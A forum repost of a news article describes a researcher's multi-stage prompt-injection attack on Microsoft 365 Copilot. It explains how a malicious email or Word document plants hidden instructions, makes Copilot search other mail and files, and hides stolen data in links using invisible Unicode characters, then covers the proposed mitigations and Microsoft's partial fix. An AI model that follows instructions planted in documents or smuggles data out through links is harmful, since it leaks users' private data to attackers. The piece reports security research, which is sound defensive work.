ASCII Smuggling: How Hackers Turned Copilot into a Personal Spy

Friend

Professional
Messages
2,653
Reaction score
850
Points
113
Invisible instructions force the AI to act against the will of its creators.

A cybersecurity researcher has discovered a critical vulnerability in Microsoft 365's integrated Copilot AI assistant that allows attackers to steal sensitive data.

The exploit, previously submitted to the Microsoft Security Response Center (MSRC), combines several sophisticated techniques at once, creating significant risks to data security and privacy. The vulnerability was identified in a study published by the Embrace The Red team.

The exploit is a multi-stage attack. It begins when the user receives a malicious message or document that contains hidden instructions. When these instructions are processed by Copilot, the tool is automatically activated and starts looking for additional emails and documents, scaling up the attack without user intervention.

A key element of this exploit is the so-called ASCII Smuggling. This technique uses special Unicode characters to make the data invisible to the user. Attackers can embed sensitive information in hyperlinks that, when clicked, send data to servers they control.

The study demonstrated a situation where a Word document containing specially designed instructions was able to trick Microsoft Copilot into performing actions typical of fraudulent activity. This document used the "Prompt Injection" methodology, which made it possible to inject commands into the text that Copilot perceived as legitimate requests.

When Copilot processed this document, it began to perform the actions specified in it as if they were normal user commands. As a result, the tool automatically initiated actions that could lead to the leakage of sensitive information or other types of fraud, without any warning to the user.

The last stage of the attack is data exfiltration. By controlling Copilot and gaining access to additional data, attackers embed hidden information into hyperlinks, which are then sent to external servers when clicked by users.

To mitigate the risk, the researcher suggested a number of measures to Microsoft, including disabling the interpretation of Unicode tags and preventing hyperlinks from being displayed. While Microsoft has already implemented some fixes, the details of these measures remain undisclosed, raising concerns.

The company's response to the identified vulnerability was partially successful: some exploits are no longer functional. However, the lack of detailed information about the applied fixes leaves questions about the complete safety of the tool.

This case highlights the complexity of ensuring security in AI-driven tools and the need for continued collaboration and transparency to protect against future threats.

Source
 
Top